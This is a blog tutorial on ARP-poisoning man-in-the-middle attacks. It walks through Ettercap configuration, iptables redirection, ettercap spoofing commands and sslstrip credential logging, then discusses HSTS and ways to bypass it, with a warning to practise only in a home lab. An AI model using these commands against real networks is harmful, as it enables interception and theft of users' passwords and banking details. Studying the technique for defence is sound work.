Arp Poisoning — The Art of Man-In-The-Middle Attacks

UPDATE: This is one of my old posts from a couple of years ago that I imported to Medium — The information will be out of date and advances in MiTM attacks have moved on considerably, as well as my knowledge, this is a high level overview of the Man in the middle attacks. Check out Bettercap I recommend it over Ettercap now.

Information security is a growing concern these days as our world becomes ingrained and managed by machines and servers,.

We are seeing whats known as the IoT taking off and being made affordable and available to almost every household so if you want a WIFI connected fridge you can get one.

Many people already use the internet for banking and socializing but how secure is it really? Is it possible for people to pluck your username, pin and password from the air?… the answer is absolutely!

If a hacker wants to access your information and they have the skill set to do so then they will. Being a web developer I have always been interested when I would see people hacking in movies and thinking how secure are my own web applications if people are exploiting massive websites like AOL, Sony and AT&T. So I started to research a lot of the techniques that hackers employ so that I would understand how to make my code more resistant to these attacks. One subject that caught my attention and I have been meaning to write about it for almost 3 years is MITM or Man-In-The-Middle attacks.

Although this is not something that I can write better code and it will mitigate the attacks it still caught my interest so I delved into the subject more and I have followed its progressions and weaknesses . MITM is exactly what its name suggests, there is someone between you and the router and they are collecting the packets sent between you and the router which may include highly sensitive information like bank details and although banks nowadays use HTTPS to encrypt the traffic there is still a lot of websites that don’t, for instance, an attacker sitting in a cafe with a laptop has poisoned the ARP cache and then some unsuspecting citizen logs into an incredibly popular free online dating website that I cant mention, which as of writing, does not use an SSL cert, the attacker would then have your password and username once you log in.. Scary stuff and its also a favorite technique of the NSA.

Fig 1:Man In The Middle attack, The victims traffic now flows through an attackers PC before getting forwarded onto the webserver.

I will be outlining an old school technique here that will work provided the site does not use HTTPS, if you are interested in how sites may be cracked that do use that protocol then read on near the end.

You will need a Linux machine with Ettercap and SSLstrip by Marlin Moxiespike installed.

Please note the following things about the Ettercap machine behaviour:

  • Every time Ettercap starts, it disables IP forwarding in the kernel and begins to forward packets itself.
  • It can slow down the network performances between the two hosts because of the packets’ machine process time.
  • Ettercap needs root privileges to open the Link Layer sockets. After the initialization phase, the root privileges are not needed anymore, so Ettercap drops them to UID = 65535 (nobody). Since Ettercap has to write (create) log files, it must be executed in a directory with the right permissions.

First off we want to enable packet forwarding by executing the following:

root@pentest_server: echo 1 > /proc/sys/net/ipv4/ip_forward

To see if you have enabled the packet forwarding you want to cat the file, result in in either 1 being enabled and 0 being disabled.

root@pentest_server: cat /proc/sys/net/ipv4/ip_forward
1

Now you need to find out where the etter.conf resides on your system, on kali you can use locate not sure if that exists on other distro’s but to find it you also use find / -name “*etter.conf*”:

root@pentest_server: locate etter.conf
/etc/ettercap/etter.conf
/usr/share/man/man5/etter.conf.5.gz
root@pentest_server: nano /etc/ettercap/etter.conf

At the top of the configuration file you will want to change the ec_uid and ec_gid numbers to 0, this will allow Ettercap to runs as an admin.

[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default

In the same file but down near the end you will need to uncomment out these two lines

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"

We need to route all tcp traffic from port 80 to port 8080 so execute the following command to adjust the nat table:

root@pentest_server: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

That should be Ettercap set up now you need to configure the execution command that will poison the ARP cache and start the ARP spoofing.

Just to note one major caveat with this technique is that it is highly illegal to try this out on any kind of public networks, I would suggest setting up your own lab at home . If you were a malicious user and you wanted to target a specific person on the LAN/WLAN you would need to get their IP address on the network so that you could target them specifically, simple tools like the Fing app ( available for iPhone and Android ) can be quite useful as sometimes you can find the computers name that the user has set themselves which will give you a basic insight into the subject of social engineering, (targeting people using the information that people have readily available on the world wide web) but that’s a whole other kettle of fish which i’ll get into another day as its incredibly vast as you can imagine.

also another thing worth noting in the following 3 commands is that I have specified the networking interface on my attack machine by using the -I flag which is set to wlan0, yours may be different.

So to target a specific ip you would execute the following:

root@pentest_server: sudo ettercap -Tq -M arp:remote /192.168.1.18/ -P autoadd -I wlan0

To target a specific range of IP addresses just add a hyphen and the range you want it to go to, this one goes from machine 192.168.0.1 up to 192.168.1.36:

root@pentest_server: sudo ettercap -Tq -M arp:remote /192.168.1.1-36/ -P autoadd -I wlan0

To poison everything on the subnet, which i would advise against not just because its morally wrong but it will slow your machine down quite considerably, you need to fire off:

root@pentest_server: sudo ettercap -Tq -M arp:remote // // -P autoadd -I wlan0

Congratulations the ARP is now poisoned. Back in the day, only about 3 years ago if you wanted to steal peoples passwords, bank details and emails etc from any website even if they were using and SSL cert all you needed to do was open up another terminal window and execute the following, while specifying the -w flag which would log all the passwords etc:

root@pentest_server: sslstrip -a -l 8080 -w /tmp/hacked_passwords.txt

The last command was utilizing a program called SSL Strip, so if your network has been hijacked and you visit your banks login area which should have a valid SSL cert ensuring that any information you post will be sent via the secure HTTPS protocol, but because your network has been hijacked you will be communicating with the website via HTTP protocol and any usernames, pins or passwords will be posted from the form in your browser via plain text and saved to the file /tmp/hacked_passwords.txt whereas normally HTTPS encrypts all data sent by the login form.

Luckily for most SSL strip does not work so effectively these days, If you follow through these steps on your Linux machine and then move to the victims PC and try visit a secure site like Ulster Bank, Twitter or Facebook you will come across the following error page, which clearly states that an attacker my be trying to steal your information, and how right you are ?

In the error message you will see down the end “You cannot visit www.facebook.com right now because the website uses HSTS”.. So what is HSTS ? HTTP Strict Transport Security (HSTS) allows web servers to declare that web browsers (or other complying user agents) should only interact with them using secure HTTPS connections, and never via the insecure HTTP protocol which as mentioned previously does not encrypt your passwords or other sensitive information.

Essentially the basic parts of HSTS which concern the amateur hacker is a preloaded list of websites set within most modern browsers I recommend checking out this link which shows you how this list is configured on chromium.

Although this method has been developed specifically to thwart the exact attack I have outlined here, its not completely infallible. I have heard of ways where you spoof the domain Facebook.com to redirect to a sub-domain like, for instance reptilehaus.facebook.com using the hosts file and some other Arp Spoofing methods. Another possible way is if you take some information from the WIKI page on HSTS is the following line:

The HSTS Policy[2] is communicated by the server to the user agent via a HTTP response header field named “Strict-Transport-Security”. HSTS Policy specifies a period of time during which the user agent shall access the server in a secure-only fashion.

Which leaves a possibility for stripping out this header to the browser and then the browser never knows it has to enforce it. I have uploaded an interesting document put together by Jose Selvi Bypassing-HTTP-Strict-Transport-Security which outlines his findings into defeating HSTS, very interesting stuff to get into.